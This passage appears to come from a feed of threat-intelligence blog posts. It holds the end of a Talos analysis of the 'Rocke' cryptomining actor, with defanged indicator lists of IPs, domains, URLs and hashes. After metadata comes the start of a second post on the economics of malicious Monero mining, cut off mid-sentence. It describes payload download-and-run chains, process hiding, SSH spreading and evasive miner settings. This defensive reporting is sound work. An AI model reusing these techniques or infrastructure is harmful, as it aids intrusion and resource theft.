a wget request from our Struts2 honeypot for a file named \"0720.bin\" located on 118[.]24[.]150[.]172:10555. We visited this IP and found it was an open HFS hosting \"0720.bin\" along with 10 additional files: \"3307.bin,\" \"a7,\" \"bashf,\" \"bashg,\" \"config.json,\" \"lowerv2.sh,\" \"pools.txt,\" \"r88.sh,\" \"rootv2.sh\" and \"TermsHost.exe.\" We set about examining these files. \n \n \n[](<https://3.bp.blogspot.com/-Wv1QkpgsIM0/W4gFUMGqKFI/AAAAAAAAAx4/evI36ADu_wE3nWnR38WNm6I2gitFSIngwCLcBGAs/s1600/image5.png>) \n--- \nScreenshot of HFS system \n \n \n \n \nWe had previously observed this same IP scanning for TCP port 7001 throughout May 2018. This was potentially a scan for Oracle WebLogic servers, which listens on TCP port 7001 by default. \n \nBoth \"0720.bin\" and \"3307.bin\" are similar ELF files of similar size (84.19KB) that reach out to 118[.]24[.]150[.]172, and were marked clean in VirusTotal at the time of discovery. Morpheus Labs described a similar file that connects to the same IP address, which could open a shell on the victim's machine if a password-verified instruction was issued from the C2. In both our samples, as well as the ones that [Morpheus Labs](<https://morphuslabs.com/criminals-dont-read-instructions-or-use-strong-passwords-a09439617867&sa=D&ust=1535643040331000>) described, the hard-coded password was not only identical, but also located at the same offset. \n \n[](<https://3.bp.blogspot.com/-gkkEgex3fQE/W4gFfUPyS7I/AAAAAAAAAx8/FIip4n1BydgCUlwQQoEJKmNlfvJ3ShivQCLcBGAs/s1600/image3.png>) \n--- \nHard-coded password \n \n \n \n\"A7\" is a shell script that kills a variety of processes related to other cryptomining malware (including those with names matching popular mining malware such as \"cranberry,\" \"yam,\" or \"kworker\"), as well as mining in general (such as \"minerd\" and \"cryptonight\"). It detects and uninstalls various Chinese AV, and also downloads and extracts a tar.gz file from blog[.]sydwzl[.]cn, which also resolves to 118[.]24[.]150[.]172. The script downloads a file from GitHub called [\"libprocesshider,\"](<https://github.com/gianlucaborello/libprocesshider&sa=D&ust=1535643040332000>) which hides a file called \"x7\" using the ID preloader. The script looks for IP addresses in known_hosts and attempts to SSH into them, before downloading \"a7\" again from the actor's HFS at 118[.]24[.]150[.]172, and execute it. \n \n[](<https://3.bp.blogspot.com/-kHdZB-4kmko/W4gF3DsxTGI/AAAAAAAAAyE/hYEz3KrdFgIkb7EvjWOa_-K-iwZvnGmzACLcBGAs/s1600/image4.png>) \n--- \nExtract of Source Code of \"a7\" \n \n \n \n \n\"Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This is why we have named the actor \"Rocke\" (note that for MinerGate, an email can be used in place of a Monero wallet number \u2014 it's simply the login email for the MinerGate platform). \"Pools.txt\" appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. This configuration file contains the same actor pool and wallet information as the first. \n \n\"Bashf\" is a variant of XMR-stak while \"bashg\" is a variant of XMRig. \n \n \n \n\"Lowerv2.sh\" and \"rootv2.sh\" are similar shell scripts that attempt to download and execute the mining malware components \"bashf\" and \"bashg,\" hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. \n \n\"R88.sh\" is a shell script that installs a cron job and attempts to download \"lowerv2.sh\" or \"rootv2.sh.\" \n \n\"TermsHost.exe\" is a PE32 Monero miner. Based on the config file it uses, it appears to be the [Monero Silent Miner](<https://xmrminer.net/faq.php&sa=D&ust=1535643040335000>). This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls.\" The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool. The sample also creates the UPX-packed file \"dDNLQrsBUE.url\" in the Windows Start Menu Folder. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system. \n \nThe payload appears to be similar to one used by the Iron Cybercrime Group, as [reported](<https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/>) by cybersecurity firm Intezer in May. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure. So, while we can asses with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group. \n \n\n\n## The actor\n\n \nThrough Rocke's MinerGate Monero wallet email [rocke@live.cn](<mailto:rocke@live.cn>), we were able to uncover additional information about the actor. We noticed that Rocke's C2 was registered to the address jxci@vip.qq.com. We then found a[ leak](<http://www.moonsec.com/post-467.html&sa=D&ust=1535643040337000>) of user information from the Chinese security site FreeBuf that showed that a user named \"rocke\" was associated with the email [jxci@vip.qq.com](<mailto:jxci@vip.qq.com>). This suggested that they were one in the same. [4] \n \nRocke has been observed seeking access to cloud storage services, as well as obtaining manuals for programming in the Chinese Easy language. \n \nThe majority of websites registered to Rocke list Jiangxi Province addresses for their registration. Some of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food. We had had additional indications that Rocke is from Jiangxi based on their GitHub (see below). It is possible that the \"jx\" in jxci@vip.qq.com stands for Jiangxi. Therefore, we assess with high confidence that Rocke operates from Jiangxi Province. \n \n\n\n### The GitHub\n\n \nWe identified a [GitHub page](<https://github.com/rocke&sa=D&ust=1535643040338000>) apparently associated with Rocke. The GitHub page lists Rocke as being affiliated with Jiangxi Normal University. In one [repository folder](<https://github.com/rocke/rocke.github.io/tree/master/sample&sa=D&ust=1535643040339000>), we found several of the same files which were found on the HFS system, including several of the shell scripts with their wallet information included, as well as variants of the miner. \n \n\n\n[](<https://2.bp.blogspot.com/-SNtJa5UiPK4/W4gGCqRKeUI/AAAAAAAAAyI/5Q6jWCI6uS45BK8w0iehPGTNISfSnZIMQCLcBGAs/s1600/image2.png>)\n\n \n \nWe found additional repositories for the same account. Within these repositories, we found scripts similar to those found in previous campaigns, with the exception that they reached out to sydwzl[.]cn in addition to the previously observed domain 3389[.]space. These findings support the link between Rocke and the activity we previously observed in April and May. \n \nWe also found an [additional repository](<https://github.com/gosrs&sa=D&ust=1535643040339000>) through Rocke's page that's hosting nearly identical content, but with a different C2. However, we are unable to determine how that page is being used or who is using it. \n \nThe files within their various repositories show that Rocke has become interested in browser-based JavaScript mining through the tool CryptoNote, as well as browser-based exploitation through the Browser Exploitation Framework. It appears that they are relying on fake Google Chrome alerts, fake apps, and fake Adobe Flash updates to social engineer users into downloading malicious payloads. \n \n\n\n[](<https://3.bp.blogspot.com/-RfGQEzxzT8U/W4gGOJCNnWI/AAAAAAAAAyQ/9LUooe3vkT4oisVEs5G9zakzcxEqLdirQCLcBGAs/s1600/image6.png>)\n\n \n \n\n\n[](<https://4.bp.blogspot.com/--PZgS5QMD4c/W4gGVIWDJxI/AAAAAAAAAyY/5HcEvufCv5UrUxV5E-F9btlI7knaiWH1QCLcBGAs/s1600/image1.png>)\n\n \n \nOne of the JavaScript files in the repository, named \"command.js,\" uses hidden IFrames to deliver payloads hosted on CloudFront domains. The payload that we were able to obtain was UPX packed and behaved very similarly to the file \"dDNLQrsBUE.url\" dropped by \"TermsHost.exe.\" \n \nRocke has also shown interest in other security-related repositories. They have forked repositories with exploit information, including those related to Apache Struts 2, JBoss and Shadow Brokers, as well as more general-use tools such as masscan, proxy tools and brute forcers. \n \n\n\n## Conclusion\n\n \nBased on their activity in the past few months, Talos assesses with high confidence that Rocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines. It is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware. Besides noisy scan-and-exploit activity, it appears that Rocke is likely also pursuing social engineering as a new infection vector, as demonstrated by the repositories involving fake Adobe Flash and Google Chrome updates. \n \nDespite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating. Rocke's various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals. \n \n\n\n## IOCs:\n\n \n \n\n\n### Earlier campaign:\n\n \n \n\n\n#### Attacking IPs targeting Struts:\n\n \n \n52[.]167[.]219[.]168: Attacking IP using repo at gitlab \n120[.]55[.]226[.]24: Attacking IP using repo at gitee \n \n\n\n#### Attacking IP targeting WebLogic:\n\n \n \n27[.]193[.]180[.]224 \n \n\n\n#### Attacking IPs targeting ColdFusion:\n\n \n \n112[.]226[.]250[.]77 \n27[.]210[.]170[.]197 \n112[.]226[.]74[.]162 \n \n\n\n#### Domains\n\n \n3389[.]space \n \n\n\n#### URLs\n\n \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/a \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/config[.]json \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/dir[.]dir \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/h32 \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/upd \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/x86_64 \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/h64 \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/x \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/run \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/logo[.]jpg \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/a \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/cron[.]d \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/dir[.]dir \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/x \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/x86_64 \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/run \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/upd \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/upd \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/x \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/cron[.]d \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/h64 \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/a \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/config[.]json \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/config[.]json \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/run \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/h32 \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/dir[.]dir \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/x86_64 \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/h32 \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/h64 \nhxxp://93[.]174[.]93[.]149/[.]xxxzlol[.]tar[.]gz \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/logo[.]jpg \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/logo[.]jpg \n \n\n\n#### Hashes:\n\n \nLogo.jpg: ad68ab153623472bbd8220fb19c488ae2884d9b52bc65add5d54b1821b4b743a \na: 6ec8201ef8652f7a9833e216b5ece7ebbf70380ebd367e3385b1c0d4a43972fb \ncron.d: f6a150acfa6ec9d73fdecae27069026ecf2d833eac89976289d6fa15713a84fe \ndir.dir: a20d61c3d4e45413b001340afb4f98533d73e80f3b47daec42435789d12e4027 \nh32: 45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161 \nh64: 7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf \n \nlogo.jpg (from gitee[.]com): f1f041c61e3086da8157745ee01c280a8238a379ca5b4cdbb25c5b746e490a9b \n \nlogo.jpg (from gitlab[.]com): ad68ab153623472bbd8220fb19c488ae2884d9b52bc65add5d54b1821b4b743a \n \nrun: 0c358d826c4a32a8c48ce88eb073f505b555fc62bca6015f5270425c58a0d1c5 \nupd: 187d06f1e6020b6787264e2e700c46c463a7818f07db0b051687f3cba65dbe0b \nx (32-bit miner): 6e80a9d843faf27e239b1a767d29c7443972be1ddf5ff5f5f9fc9a2b55a161f5 \nx86_64 (64-bit miner): 2ad07f8d1985f00cd05dafacbe5b6a5b1e87a78f8ae8ecdf91c776651c88a612 \n \n\n\n### More recent campaign:\n\n \n \n\n\n#### IPs\n\n \n123[.]249[.]9[.]149: Issues get request for 0720.bin \n118[.]24[.]150[.]172: Rocke's HFS, also resolves to C2 sydwzl[.]cn \n \n\n\n#### Domains:\n\n \nsydwzl[.]cn \nblockbitcoin[.]com: Reached out to by Install.exe \ndazqc4f140wtl[.]cloudfront[.]net: file server \n3g2upl4pq6kufc4m[.]tk: file server \nd3goboxon32grk2l[.]tk: file server \nenjoytopic[.]tk: file server \nrealtimenews[.]tk: file server \n8282[.]space: older C2 \n \n\n\n#### Domains registered to Rocke (not all are necessarily malicious):\n\n \n \n5-xun[.]com \n88180585[.]com \nfirstomato[.]com \njxtiewei[.]com \nncyypx[.]net \n \n\n\n#### URLs\n\n \nhxxp://d20blzxlz9ydha[.]cloudfront[.]net/Install.exe \nhxxp://www[.]amazon[.]com:80/N4215/adj/amzn.us.sr.aps?sz=160x600&amp;oe=oe=ISO-8859-1;&amp;sn=12275&amp;s=3717&amp;dc_ref=http%3A%2F%2Fwww.amazon.com \nhxxp://www[.]amazon[.]com:80/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books \n \n\n\n#### Hashes\n\n \n55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b 0720.bin \n38066751cb6c39691904ffbef86fe3bdfa737e4ba64add4dd90358245fa2b775 3307.bin \n89b3463664ff13ea77256094844c9cf69d3e408d3daf9ffad3aa18af39bab410 TermsHost.exe \nd341e3a9133e534ca35d5ccc54b8a79f93ff0c917790e7d5f73fedaa480a6b93 a7 \n442e4a8d35f9de21d5cbd9a695a24b9ac8120e548119c7f9f881ee16ad3761e6 bashf \n7674e0b69d848e0b9ff8b82df8671f9889f33ab1a664f299bcce13744e08954c bashg \n7051c9af966d1c55a4096e2af2e6670d4fc75e00b2b396921a79549fb16d03d4 lowerv2.sh \n2f5bf7f1ea7a84828aa70f1140774f3d4ce9985d05a676c8535420232e2af87e pools.txt \nba29d8a259d33d483833387fad9c7231fbb3beb9f4e0603b204523607c622a03 config.json \n7c2dbc0d74e01a5e7c13b4a41d3a1f7564c165bd532e4473acea6f46405d0889 r88.sh \nd44e767132d68fdb07c23c848ff8c28efe19d1b7c070161b7bd6c0ccfc858750 rootv2.sh \n35cb971daafd368b71ad843a4e0b81c80225ec20d7679cfbf78e628ebcada542 Install.exe \n654ec27ea99c44edc03f1f3971d2a898b9f1441de156832d1507590a47b41190 ZZYO \nF808A42B10CF55603389945A549CE45EDC6A04562196D14F7489AF04688F12BC XbashY \n725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054 reg9.sct \nd7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6 m.png \nece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50 hidden executable in m.png \n \n \n", "cvss3": {}, "published": "2018-08-30T08:26:00", "type": "talosblog", "title": "Rocke: The Champion of Monero Miners", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-3066"], "modified": "2018-08-31T17:22:22", "id": "TALOSBLOG:7B703A19FAC4E490CFFB2AE43C1606DF", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/e2oaIaRaI6k/rocke-champion-of-monero-miners.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-31T17:59:53", "description": "## The Dark Side of the Digital Gold Rush\n\n \n_This post was authored by [Nick Biasini](<https://twitter.com/infosec_nick>), [Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>), [Warren Mercer](<https://twitter.com/securitybeard?lang%3Den>) and [Josh Reynolds](<https://www.twitter.com/JershMagersh>) with contributions from [Azim Khodijbaev](<https://twitter.com/ashukuhi>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n[](<https://1.bp.blogspot.com/-arFNhXlv5Mw/WnHgQ5o5WDI/AAAAAAAABpc/R8cgpTc4WnsyovMYujbV815KaTNd1mQgwCLcBGAs/s1600/pan-gold_transp.png>)\n\n_ \n_ \n\n\n## Executive Summary\n\n \nThe threat landscape is constantly changing; over the last few years malware threat vectors, methods and payloads have rapidly evolved. Recently, as cryptocurrency values have exploded, mining related attacks have emerged as a primary interest for many attackers who are beginning to recognize that they can realize all of the financial upside of previous attacks, like ransomware, without needing to actually engage the victim and without the extraneous law enforcement attention that comes with ransomware attacks. \n \nThis focus on mining isn't entirely surprising, considering that various cryptocurrencies along with \"blockchain\" have been all over the news as the value of these currencies has exponentially increased. Adversaries have taken note of these gains and have been creating new attacks that help them monetize this growth. Over the past several months Talos has observed a marked increase in the volume of cryptocurrency mining software being maliciously delivered to victims. \n \nIn this new business model, attackers are no longer penalizing victims for opening an attachment, or running a malicious script by taking systems hostage and demanding a ransom. Now attackers are actively leveraging the resources of infected systems for cryptocurrency mining. In these cases the better the performance and computing power of the targeted system, the better for the attacker from a revenue generation perspective. IoT devices, with their lack of monitoring and lack of day to day user engagement, are fast becoming an attractive target for these attackers, as they offer processing power without direct victim oversight. While the computing resources within most IoT devices are generally limited, the number of exposed devices that are vulnerable to publicly available exploits is high which may make them attractive to cyber criminals moving forward. \n \nTo put the financial gains in perspective, an average system would likely generate about $0.25 of Monero per day, meaning that an adversary who has enlisted 2,000 victims (not a hard feat), could generate $500 per day or $182,500 per year. Talos has observed botnets consisting of millions of infected systems, which using our previous logic means that these systems could be leveraged to generate more than $100 million per year theoretically. It is important to note that due to volatility present across cryptocurrency markets, these values may change drastically from day to day. All calculations in this blog were made based on XMR/USD at the time of this writing. \n \nThis is all done with minimal effort following the initial infection. More importantly, with little chance of being detected, this revenue stream can continue in perpetuity. While these are impressive figures, it's also important to factor in a few details that can further increase the value of these attacks exponentially: \n\n\n * The value of many cryptocurrencies are skyrocketing. Monero, one of the most popular mining targets, saw a 3000% increase over the last 12 months.\n * These attacks are much stealthier than their predecessors. Attackers are not stealing anything more than computing power from their victims and the mining software isn't technically malware -- So theoretically, the victims could remain part of the adversary's botnet for as long as the attacker chooses.\n * Once the currency is mined, there is no telling what the attacker might do with it. This could become a long term investment (or even retirement) scheme for these attackers \u2013 sitting on this currency until it hits such a point where the attacker decides to cash in. \n\n## \n\n## Introduction\n\n \nThroughout the past couple of years ransomware has dominated the threat landscape and for good reason. It creates a highly profitable business model that allows attackers to directly monetize their nefarious activities. However, there are a couple of limitations with the use of ransomware. First is the fact that only a small percentage of infected users will actually pay the ransom demanded by the attacker. Second, as systems and technology get better at detecting and blocking ransomware attacks the pool of possible victims is changing. Potential victims in many countries lack the financial capabilities to pay $300-$500 to retrieve their data. Possibly related to these aforementioned limitations, we have begun to see a steady shift in the payloads that are being delivered. This is especially true for some of the most common methods for malware distribution such as exploit kits and spam campaigns. \n \nOver the past several months Talos has started to observe a marked increase in the volume of cryptocurrency miners being delivered to victims. Cryptocurrency and \"blockchain\" have been all over the news over the past several months as the value of these currencies has increased on an exponential path. One of the most effective ways to generate these currencies is through mining and adversaries are obviously paying attention. \n \n\n\n## What is 'Mining'?\n\n \nAt a high level mining is simply using system resources to solve large mathematical calculations which result in some amount of cryptocurrency being awarded to the solvers. Before we get too deep into mining let's address the currencies that make sense to mine. \n \nBitcoin (BTC) is the most well known and widely used cryptocurrency by a wide margin. It's been mined since its inception, but today mining isn't an effective way to generate value. If you look across all of the cryptocurrencies, there are only a couple that are worth mining without specialized hardware called ASICs (Application Specific Integrated Circuits). The differences across the different cryptocurrencies are based on the hashing algorithm used. Some have been specifically designed in an attempt to prevent or hinder the use of such specialised hardware and are more focused on consumer grade equipment such as CPU &amp; GPU hardware. Currently, the most valuable currency to mine with standard systems is Monero (XMR) and adversaries have done their research. In addition Monero is extremely privacy conscious and as governments have started to scrutinize Bitcoin more closely, Monero and other coins with heavy emphasis on privacy may become a safe haven for threat actors. \n \nThere are two ways that mining can be performed, either with a stand alone miner or by leveraging mining pools. Pool-based crypto mining allows you to pool the resources of multiple systems resulting in a higher hashrate and theoretically the production of increased amounts of currency. It's pool-based mining of Monero that we have seen most frequently leveraged by attackers as it allows for the greatest amount of return on investment and the required mining software can be easily delivered to victims. The use of pooled mining also maximizes the effectiveness of the computing resources found in standard systems that attackers attempt to compromise. This is similar to launching Distributed Denial of Service (DDoS) attacks where 100,000 machines flooding a target with bogus traffic becomes much more effective compared to a single system under the attacker's control sending bogus traffic. \n \n\n\n## How does pool based mining work?\n\n \nPool-based mining is coordinated through the use of 'Worker IDs'. These IDs are what tie an individual system to a larger pool and ensures the coin mined by the pool that is associated with a particular Worker ID are delivered to the correct user. It's these Worker IDs that allowed us to determine the size and scale of some of the malicious operations as well as get an idea of the amount of revenue adversaries are generating. For the purposes of this discussion we will be assuming the following: \n\n\n 1. The amount of hashes per second that a typical computer can compute will be assumed to be ~125 H/s.\n 2. While in reality mining does not always guarantee successful generation of the cryptocurrency being mined, we will assume that for our purposes it is successful as it allows for a better understanding of the earning potential for these malicious mining pools.\nThese miners typically operate from the command line and make use of a series of arguments used to establish how the mining should be performed. A typical example of the command line syntax used to execute the mining software and specify the arguments is below: (note that there are variations in the parameter names used based on the specific mining software being used.) \n\n\n[](<https://2.bp.blogspot.com/-ZmEzpdA1pzU/WnG17Z6ncAI/AAAAAAAAAkM/v_-jqvA3Tx4v4Ifg6PSTn6xHAxs92brwgCLcBGAs/s1600/image7.png>)\n\n**Example Command Line Syntax**\n\n \nAs you can see there are two primary argument values required: The URL for the mining pool and the 'Worker ID' that is used to tie the mining activity taking place on the system to a specific mining pool which is used to manage how payouts are conducted. However, through our investigation we have found a plethora of other parameters that attackers or miners can specify in an attempt to hide their activities. If the mining software is executed without these options, victims might notice significant performance degradation on their systems as no computing resource limits are enforced. These options include: \n\n\n * Limits on CPU Usage.\n * Limits on System Temperature.\n * Amount of cores being used.\n * Sleep periods.\nEach mining program comes with its own set of flags that are taken advantage of in various ways by both legitimate and malicious miners. We have observed that these options are typically deployed by the attackers when they achieve persistence (i.e. through the creation of Scheduled Tasks or Run keys that execute the miner using the Windows Command Processor specifying the arguments to use). \n \n\n\n## Origins on the Underground\n\n \nTalos has been observing discussions regarding the use of crypto miners as malicious payloads by both Chinese and Russian crimeware groups. We first observed Chinese actors discussing miners and the associated mining botnets in November 2016 and the interest has been steadily building since that time. \n \nFrom a Russian underground perspective there has been significant movement related to mining in the last six months. There have been numerous discussions and several offerings on top-tier Russian hacking forums. The discussions have been split with the majority of the discussion around the sale of access to mining bots as well as bot developers looking to buy access to compromised hosts for the intended purpose of leveraging them for crypto mining. The popularity increase has also been accompanied with a learning curve associated with mining, including a better understanding around how much coin can be mined and the opportune times to conduct the mining activity. As far as the malware that can be used to conduct mining, most of them are written in C# or C++ and as is common on these forums they are advertised with low detection rate, persistence, and constant development. In many cases we are observing updates to these threats on a daily or weekly basis. \n \nIn general the attackers have been pleased with the amount of revenue the bots generate as well as the potential to grow that revenue. This is indicative of a threat that is poised to become more pervasive over time. Let's take a look at how malicious mining works and the threats that are delivering them. \n \n\n\n## Malicious Mining\n\n \nMalicious mining is the focus of this post since its an emerging trend across the threat landscape. Adversaries are always looking for ways to monetize their nefarious activities and malicious mining is quickly becoming a cash cow for the bad guys. \n \nOver the past several years ransomware has dominated the threat landscape from a financially motivated malware perspective and with good reason. It is an extremely profitable business model as we've shown through our Angler Exploit Kit [research](<https://www.talosintelligence.com/angler-exposed/>) where we estimate that the adversaries behind Angler could have been conservatively making at least $30 million annually. However, with success comes attention and with that attention came an increased focus on stopping this type of activity. Both operating systems and security vendors got better at stopping ransomware before it affected much of the system. \n \nAdversaries are left with an interesting decision, continue leveraging ransomware as a primary source of revenue as the pool of users and vulnerable systems continues to shrink or begin leveraging other payloads. There are no shortage of options available to bad guys including banking trojans, bots, credential stealers, and click-fraud malware to name a few. \n \nSo why choose crypto mining software? \n \nThere are many reasons why adversaries might choose to leverage crypto mining to generate revenue. One likely reason is that this is a largely hands off infection to manage. Once a system has a miner dropped on it and starts mining nothing else is needed from an adversary perspective. There isn't any command and control activity and it generates revenue consistently until its removed. So if an adversary notices a drop off in nodes mining to their pool it's time to infect more systems. Another is that it's largely unnoticed by the majority of users. Is a user really going to notice that mining is going on while they are reading their email, browsing the web, or writing up their latest proposal? From this perspective miners are the polar opposite of ransomware, hiding under the users purview for as long as possible. The longer the user doesn't notice the miner running the larger potential payout for the activity. \n \nThe biggest reason of them all is the potential monetary payout associated with mining activity. If it didn't generate a profit, the bad guys wouldn't take advantage of it. In this particular vein malicious miners could be a pretty large source of revenue. The biggest cost associated with mining is the hardware to mine and the electricity to power the mining hardware. By leveraging malicious miners attackers can take both of those costs out of the equation altogether. Since they are able to take advantage of computing resources present in infected systems, there is no cost for power or hardware and attackers receive all the benefits of the mined coin. \n \nLet's take a deeper dive on the amount of revenue these systems can potentially generate. As mentioned earlier the hashrate for computers can vary widely depending on the type of hardware being used and the average system load outside of the miners. An average system would likely compute somewhere around 125 hashes per second. One system alone without any hardware or electricity cost would generate about $0.25 of Monero a day, which doesn't seem like a lot but when you start pooling systems the amount of earning potential increases rapidly. \n \nSome of the largest botnets across the threat landscape consist of millions of infected systems under the control of an attacker. Imagine controlling a small fraction of the systems that are part of one of these botnets (~2,000 hosts). The amount of revenue that can be generated per day increases considerably to more than $500 in Monero per day or $182,500 per year. As we will demonstrate later in the post we have seen malicious pools that far exceed the 125 KH/s necessary to generate this type of revenue. \n \nIn one campaign that we analyzed, the attacker had managed to amass enough computing resources to reach a hash rate of 55.20 KH/s. As can be seen in the below screenshot the Total Paid value was 528 XMR, which converts to approximately $167,833 USD. In this particular case the mining pool realized that the 'Worker ID' was being used by a botnet to mine Monero. \n\n\n[](<https://3.bp.blogspot.com/-MG_1-PGHnRc/WnG2S4DYdCI/AAAAAAAAAkQ/wm5t4BG-cyQT8H5R0SvXpiTP-vQ0i2CKQCLcBGAs/s1600/image21.png>)\n\n**Worker ID Statistics**\n\n \nIn a series of attacks that we observed that began at the end of December 2017, attackers were leveraging exploits targeting Oracle WebLogic vulnerabilities (CVE-2017-3506 / CVE-2017-10271). In these cases, successful exploitation would often lead to the installation and execution of mining software. \n\n\n[](<https://4.bp.blogspot.com/-M5-8y8Fx7Yo/WnG2YgVvaQI/AAAAAAAAAkU/ZVgb1EDHpsERm40rt653hTMYUH1Qvh51ACLcBGAs/s1600/image31.png>)\n\n**Historical Hash Rate**\n\n \nIn analyzing the size and scope of this campaign, we observed that shortly after these attacks began the 'Worker ID' being used was generating over 500 KH/s. At the time of this writing, this particular attacker is still generating approximately 350 KH/s. \n\n\n[](<https://3.bp.blogspot.com/-pjStDnu5oE8/WnG2d2dGbvI/AAAAAAAAAkY/Rxy4y24ajzQfDgPsl0EfQA9VeuZ5BDQegCLcBGAs/s1600/image11.png>)\n\n**Current Hash Rate**\n\n \nUsing an online calculator that takes hash rate, power consumption and cost then estimates profitability. Given a hash rate of 350 KH/s, the estimated amount of Monero that would be mined per day was 2.24 XMR. This means that an attacker could generate approximately $704 USD per day, which equals $257,000 per year. This clearly indicates how lucrative this sort of operation could be for attackers. \n \nAnalyzing the statistical data and payment history information associated with this 'Worker ID' shows that a total of 654 XMR have been received. At the time of this writing, that would be worth approximately $207,884. \n\n\n[](<https://2.bp.blogspot.com/-cBKLUb4FJsY/WnG2jRgOLaI/AAAAAAAAAkc/vkIhD0cKfXUcw-bRIzTnENRE5fY7kDHTACLcBGAs/s1600/image5.png>)\n\n**Worker ID Payment History**\n\n \nWhile analyzing the malware campaigns associated with the distribution of mining software, we identified dozens of high volume 'Worker IDs'. Taking a closer look at 5 of the largest operations we analyzed shows just how much money can be made by taking this approach. \n\n\n[](<https://3.bp.blogspot.com/-iFc7bTVYL4I/WnG3Ofd1fiI/AAAAAAAAAkw/OW1LuQqLbnYWaFFq3VVfkq-rxkwbhPc4ACLcBGAs/s1600/table.png>)\n\n**High Volume Calculations**\n\n \nOne additional benefit is that the value of the Monero mined has continued to rise over time. Much like Bitcoin, Monero valuation has exploded over the last year from $13 in January 2017 to over $300 at the time of this article and at times has approached $500. As long as the cryptocurrency craze continues and the value continues to increase, every piece of cryptocurrency mined increases in value which in turn increases the amount of revenue generated. That covers some of the financial reasons adversaries leverage malicious mining, but how are these miners getting on to systems in the first place. \n \n\n\n## Threats Delivering Miners\n\n \nCryptocurrency miners are a new favorite of miscreants and are being delivered to end users in many different ways. The common ways we have seen miners delivered include spam campaigns, exploit kits, and directly via exploitation. \n\n\n### Email Based\n\n \nThere are ongoing spam campaigns that deliver a wide variety of payloads such as ransomware, banking trojans, miners, and much more. Below are examples of campaigns we've seen delivering miners. The way these infections typically work is that a user is sent an email with an attachment. These attachments typically have an archive containing a Word document that downloads the miner via a malicious macro or unpacks a compressed executable that initiates the mining infection. In many of the campaigns Talos observed, the binary that is included is a widely distributed Monero miner which is executed with the miscreants worker ID and pool, allowing attackers to reap the mining benefits. \n \nBelow is an example, from late 2017, of one of these campaigns. It's a job application spoof that includes a Word document purporting to be a resume of a potential candidate. \n\n\n[](<https://3.bp.blogspot.com/-HN1jDjRs9NA/WnG3ofsv07I/AAAAAAAAAk0/4X5qS3uMf18a-Kp7PAKUc-glbFynIHzSQCLcBGAs/s1600/image24.png>)\n\n**Example Malicious Email**\n\n \nAs you can see the email contains a word document which, when opened, looks like the following. 